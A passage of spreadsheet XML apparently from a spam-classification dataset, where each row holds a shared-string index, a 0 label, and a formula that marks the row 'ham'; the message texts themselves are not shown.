      </c>
      <c r="B2745">
        <v>0</v>
      </c>
      <c r="C2745" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2746" t="s">
        <v>21</v>
      </c>
      <c r="B2746">
        <v>0</v>
      </c>
      <c r="C2746" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2747" t="s">
        <v>2210</v>
      </c>
      <c r="B2747">
        <v>0</v>
      </c>
      <c r="C2747" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2748" t="s">
        <v>2211</v>
      </c>
      <c r="B2748">
        <v>0</v>
      </c>
      <c r="C2748" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2749" t="s">
        <v>2212</v>
      </c>
      <c r="B2749">
        <v>0</v>
      </c>
      <c r="C2749" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2750" t="s">
        <v>2213</v>
      </c>
      <c r="B2750">
        <v>0</v>
      </c>
      <c r="C2750" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2751" t="s">
        <v>2214</v>
      </c>
      <c r="B2751">
        <v>0</v>
      </c>
      <c r="C2751" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2752" t="s">
        <v>2215</v>
      </c>
      <c r="B2752">
        <v>0</v>
      </c>
      <c r="C2752" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2753" t="s">
        <v>2216</v>
      </c>
      <c r="B2753">
        <v>0</v>
      </c>
      <c r="C2753" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2754" t="s">
        <v>2217</v>
      </c>
      <c r="B2754">
        <v>0</v>
      </c>
      <c r="C2754" t="str">
        <f t="shared" ref="C2754:C2817" si="43">IF(B2754="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2755" t="s">
        <v>2218</v>
      </c>
      <c r="B2755">
        <v>0</v>
      </c>
      <c r="C2755" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2756" t="s">
        <v>2219</v>
      </c>
      <c r="B2756">
        <v>0</v>
      </c>
      <c r="C2756" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2757" t="s">
        <v>2220</v>
      </c>
      <c r="B2757">
        <v>0</v>
      </c>
      <c r="C2757" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2758" t="s">
        <v>2221</v>
      </c>
      <c r="B2758">
        <v>0</v>
      </c>
      <c r="C2758" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2759" t="s">
        <v>2222</v>
      </c>
      <c r="B2759">
        <v>0</v>
      </c>
      <c r="C2759" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2760" t="s">
        <v>2223</v>
      </c>
      <c r="B2760">
        <v>0</v>
      </c>
      <c r="C2760" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2761" t="s">
        <v>2224</v>
      </c>
      <c r="B2761">
        <v>0</v>
      </c>
      <c r="C2761" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2762" t="s">
        <v>2225</v>
      </c>
      <c r="B2762">
        <v>0</v>
      </c>
      <c r="C2762" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2763" t="s">
        <v>2226</v>
      </c>
      <c r="B2763">
        <v>0</v>
      </c>
      <c r="C2763" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2764" t="s">
        <v>2227</v>
      </c>
      <c r="B2764">
        <v>0</v>
      </c>
      <c r="C2764" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2765" t="s">
        <v>2228</v>
      </c>
      <c r="B2765">
        <v>0</v>
      </c>
      <c r="C2765" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2766" t="s">
        <v>2229</v>
      </c>
      <c r="B2766">
        <v>0</v>
      </c>
      <c r="C2766" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2767" t="s">
        <v>2230</v>
      </c>
      <c r="B2767">
        <v>0</v>
      </c>
      <c r="C2767" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2768" t="s">
        <v>2231</v>
      </c>
      <c r="B2768">
        <v>0</v>
      </c>
      <c r="C2768" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2769" t="s">
        <v>2232</v>
      </c>
      <c r="B2769">
        <v>0</v>
      </c>
      <c r="C2769" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2770" t="s">
        <v>2233</v>
      </c>
      <c r="B2770">
        <v>0</v>
      </c>
      <c r="C2770" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2771" t="s">
        <v>2234</v>
      </c>
      <c r="B2771">
        <v>0</v>
      </c>
      <c r="C2771" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2772" t="s">
        <v>2235</v>
      </c>
      <c r="B2772">
        <v>0</v>
      </c>
      <c r="C2772" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2773" t="s">
        <v>2236</v>
      </c>
      <c r="B2773">
        <v>0</v>
      </c>
      <c r="C2773" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2774" t="s">
        <v>2237</v>
      </c>
      <c r="B2774">
        <v>0</v>
      </c>
      <c r="C2774" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2775" t="s">
        <v>2238</v>
      </c>
      <c r="B2775">
        <v>0</v>
      </c>
      <c r="C2775" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2776" t="s">
        <v>2239</v>
      </c>
      <c r="B2776">
        <v>0</v>
      </c>
      <c r="C2776" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2777" t="s">
        <v>2240</v>
      </c>
      <c r="B2777">
        <v>0</v>
      </c>
      <c r="C2777" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2778" t="s">
        <v>2241</v>
      </c>
      <c r="B2778">
        <v>0</v>
      </c>
      <c r="C2778" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2779" t="s">
        <v>2242</v>
      </c>
      <c r="B2779">
        <v>0</v>
      </c>
      <c r="C2779" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2780" t="s">
        <v>21</v>
      </c>
      <c r="B2780">
        <v>0</v>
      </c>
      <c r="C2780" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2781" t="s">
        <v>2243</v>
      </c>
      <c r="B2781">
        <v>0</v>
      </c>
      <c r="C2781" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2782" t="s">
        <v>2244</v>
      </c>
      <c r="B2782">
        <v>0</v>
      </c>
      <c r="C2782" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2783" t="s">
        <v>2245</v>
      </c>
      <c r="B2783">
        <v>0</v>
      </c>
      <c r="C2783" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2784" t="s">
        <v>2246</v>
      </c>
      <c r="B2784">
        <v>0</v>
      </c>
      <c r="C2784" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2785" t="s">
        <v>2247</v>
      </c>
      <c r="B2785">
        <v>0</v>
      </c>
      <c r="C2785" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2786" t="s">
        <v>2248</v>
      </c>
      <c r="B2786">
        <v>0</v>
      </c>
      <c r="C2786" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2787" t="s">
        <v>2249</v>
      </c>
      <c r="B2787">
        <v>0</v>
      </c>
      <c r="C2787" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2788" t="s">
        <v>2250</v>
      </c>
      <c r="B2788">
        <v>0</v>
      </c>
      <c r="C2788" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2789" t="s">
        <v>2251</v>
      </c>
      <c r="B2789">
        <v>0</v>
      </c>
      <c r="C2789" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2790" t="s">
        <v>2252</v>
      </c>
      <c r="B2790">
        <v>0</v>
      </c>
      <c r="C2790" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2791" t="s">
        <v>2253</v>
      </c>
      <c r="B2791">
        <v>0</v>
      </c>
      <c r="C2791" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2792" t="s">
        <v>2254</v>
      </c>
      <c r="B2792">
        <v>0</v>
      </c>
      <c r="C2792" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2793" t="s">
        <v>2255</v>
      </c>
      <c r="B2793">
        <v>0</v>
      </c>
      <c r="C2793" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2794" t="s">
        <v>2256</v>
      </c>
      <c r="B2794">
        <v>0</v>
      </c>
      <c r="C2794" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2795" t="s">
        <v>2257</v>
      </c>
      <c r="B2795">
        <v>0</v>
      </c>
      <c r="C2795" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2796" t="s">
        <v>2258</v>
      </c>
      <c r="B2796">
        <v>0</v>
      </c>
      <c r="C2796" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2797" t="s">
        <v>2259</v>
      </c>
      <c r="B2797">
        <v>0</v>
      </c>
      <c r="C2797" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2798" t="s">
        <v>2260</v>
      </c>
      <c r="B2798">
        <v>0</v>
      </c>
      <c r="C2798" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2799" t="s">
        <v>2261</v>
      </c>
      <c r="B2799">
        <v>0</v>
      </c>
      <c r="C2799" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2800" t="s">
        <v>2262</v>
      </c>
      <c r="B2800">
        <v>0</v>
      </c>
      <c r="C2800" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2801" t="s">
        <v>2263</v>
      </c>
      <c r="B2801">
        <v>0</v>
      </c>
      <c r="C2801" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2802" t="s">
        <v>2264</v>
      </c>
      <c r="B2802">
        <v>0</v>
      </c>
      <c r="C2802" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2803" t="s">
        <v>2265</v>
      </c>
      <c r="B2803">
        <v>0</v>
      </c>
      <c r="C2803" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2804" t="s">
        <v>2266</v>
      </c>
      <c r="B2804">
        <v>0</v>
      </c>
      <c r="C2804" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2805" t="s">
        <v>2267</v>
      </c>
      <c r="B2805">
        <v>0</v>
      </c>
      <c r="C2805" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2806" t="s">
        <v>2268</v>
      </c>
      <c r="B2806">
        <v>0</v>
      </c>
      <c r="C2806" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2807" t="s">
        <v>2269</v>
      </c>
      <c r="B2807">
        <v>0</v>
      </c>
      <c r="C2807" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2808" t="s">
        <v>2270</v>
      </c>
      <c r="B2808">
        <v>0</v>
      </c>
      <c r="C2808" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2809" t="s">
        <v>2271</v>
      </c>
      <c r="B2809">
        <v>0</v>
      </c>
      <c r="C2809" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2810" t="s">
        <v>2272</v>
      </c>
      <c r="B2810">
        <v>0</v>
      </c>
      <c r="C2810" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2811" t="s">
        <v>2273</v>
      </c>
      <c r="B2811">
        <v>0</v>
      </c>
      <c r="C2811" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2812" t="s">
        <v>2274</v>
      </c>
      <c r="B2812">
        <v>0</v>
      </c>
      <c r="C2812" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2813" t="s">
        <v>2275</v>
      </c>
      <c r="B2813">
        <v>0</v>
      </c>
      <c r="C2813" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2814" t="s">
        <v>2276</v>
      </c>
      <c r="B2814">
        <v>0</v>
      </c>
      <c r="C2814" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2815" t="s">
        <v>2277</v>
      </c>
      <c r="B2815">
        <v>0</v>
      </c>
      <c r="C2815" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2816" t="s">
        <v>2278</v>
      </c>
      <c r="B2816">
        <v>0</v>
      </c>
      <c r="C2816" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2817" t="s">
        <v>2279</v>
      </c>
      <c r="B2817">
        <v>0</v>
      </c>
      <c r="C2817" t="str">
        <f t="shared" si="43"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2818" t="s">
        <v>2280</v>
      </c>
      <c r="B2818">
        <v>0</v>
      </c>
      <c r="C2818" t="str">
        <f t="shared" ref="C2818:C2881" si="44">IF(B2818="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2819" t="s">
        <v>2281</v>
      </c>
      <c r="B2819">
        <v>0</v>
      </c>
      <c r="C2819" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2820" t="s">
        <v>2282</v>
      </c>
      <c r="B2820">
        <v>0</v>
      </c>
      <c r="C2820" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2821" t="s">
        <v>2283</v>
      </c>
      <c r="B2821">
        <v>0</v>
      </c>
      <c r="C2821" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2822" t="s">
        <v>2284</v>
      </c>
      <c r="B2822">
        <v>0</v>
      </c>
      <c r="C2822" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2823" t="s">
        <v>2285</v>
      </c>
      <c r="B2823">
        <v>0</v>
      </c>
      <c r="C2823" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2824" t="s">
        <v>2286</v>
      </c>
      <c r="B2824">
        <v>0</v>
      </c>
      <c r="C2824" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2825" t="s">
        <v>2287</v>
      </c>
      <c r="B2825">
        <v>0</v>
      </c>
      <c r="C2825" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2826" t="s">
        <v>2288</v>
      </c>
      <c r="B2826">
        <v>0</v>
      </c>
      <c r="C2826" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2827" t="s">
        <v>2289</v>
      </c>
      <c r="B2827">
        <v>0</v>
      </c>
      <c r="C2827" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2828" t="s">
        <v>2290</v>
      </c>
      <c r="B2828">
        <v>0</v>
      </c>
      <c r="C2828" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2829" t="s">
        <v>2291</v>
      </c>
      <c r="B2829">
        <v>0</v>
      </c>
      <c r="C2829" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2830" t="s">
        <v>2292</v>
      </c>
      <c r="B2830">
        <v>0</v>
      </c>
      <c r="C2830" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2831" t="s">
        <v>2293</v>
      </c>
      <c r="B2831">
        <v>0</v>
      </c>
      <c r="C2831" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2832" t="s">
        <v>2294</v>
      </c>
      <c r="B2832">
        <v>0</v>
      </c>
      <c r="C2832" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2833" t="s">
        <v>2295</v>
      </c>
      <c r="B2833">
        <v>0</v>
      </c>
      <c r="C2833" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2834" t="s">
        <v>2296</v>
      </c>
      <c r="B2834">
        <v>0</v>
      </c>
      <c r="C2834" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2835" t="s">
        <v>2297</v>
      </c>
      <c r="B2835">
        <v>0</v>
      </c>
      <c r="C2835" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2836" t="s">
        <v>2298</v>
      </c>
      <c r="B2836">
        <v>0</v>
      </c>
      <c r="C2836" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2837" t="s">
        <v>2299</v>
      </c>
      <c r="B2837">
        <v>0</v>
      </c>
      <c r="C2837" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2838" t="s">
        <v>2300</v>
      </c>
      <c r="B2838">
        <v>0</v>
      </c>
      <c r="C2838" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2839" t="s">
        <v>2301</v>
      </c>
      <c r="B2839">
        <v>0</v>
      </c>
      <c r="C2839" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2840" t="s">
        <v>2302</v>
      </c>
      <c r="B2840">
        <v>0</v>
      </c>
      <c r="C2840" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2841" t="s">
        <v>21</v>
      </c>
      <c r="B2841">
        <v>0</v>
      </c>
      <c r="C2841" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2842" t="s">
        <v>21</v>
      </c>
      <c r="B2842">
        <v>0</v>
      </c>
      <c r="C2842" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2843" t="s">
        <v>2303</v>
      </c>
      <c r="B2843">
        <v>0</v>
      </c>
      <c r="C2843" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2844" t="s">
        <v>21</v>
      </c>
      <c r="B2844">
        <v>0</v>
      </c>
      <c r="C2844" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2845" t="s">
        <v>21</v>
      </c>
      <c r="B2845">
        <v>0</v>
      </c>
      <c r="C2845" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2846" t="s">
        <v>21</v>
      </c>
      <c r="B2846">
        <v>0</v>
      </c>
      <c r="C2846" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2847" t="s">
        <v>2304</v>
      </c>
      <c r="B2847">
        <v>0</v>
      </c>
      <c r="C2847" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2848" t="s">
        <v>2305</v>
      </c>
      <c r="B2848">
        <v>0</v>
      </c>
      <c r="C2848" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2849" t="s">
        <v>21</v>
      </c>
      <c r="B2849">
        <v>0</v>
      </c>
      <c r="C2849" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2850" t="s">
        <v>2306</v>
      </c>
      <c r="B2850">
        <v>0</v>
      </c>
      <c r="C2850" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2851" t="s">
        <v>2307</v>
      </c>
      <c r="B2851">
        <v>0</v>
      </c>
      <c r="C2851" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2852" t="s">
        <v>2308</v>
      </c>
      <c r="B2852">
        <v>0</v>
      </c>
      <c r="C2852" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2853" t="s">
        <v>2309</v>
      </c>
      <c r="B2853">
        <v>0</v>
      </c>
      <c r="C2853" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2854" t="s">
        <v>2310</v>
      </c>
      <c r="B2854">
        <v>0</v>
      </c>
      <c r="C2854" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2855" t="s">
        <v>2311</v>
      </c>
      <c r="B2855">
        <v>0</v>
      </c>
      <c r="C2855" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2856" t="s">
        <v>2312</v>
      </c>
      <c r="B2856">
        <v>0</v>
      </c>
      <c r="C2856" t="str">
        <f t="shared" si="44"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2857" t="s">
        <v>2313</v>
      </c>
      <c r="B2857">
        <v>0</v>
      </c>
      <c r="C2857" t="str">
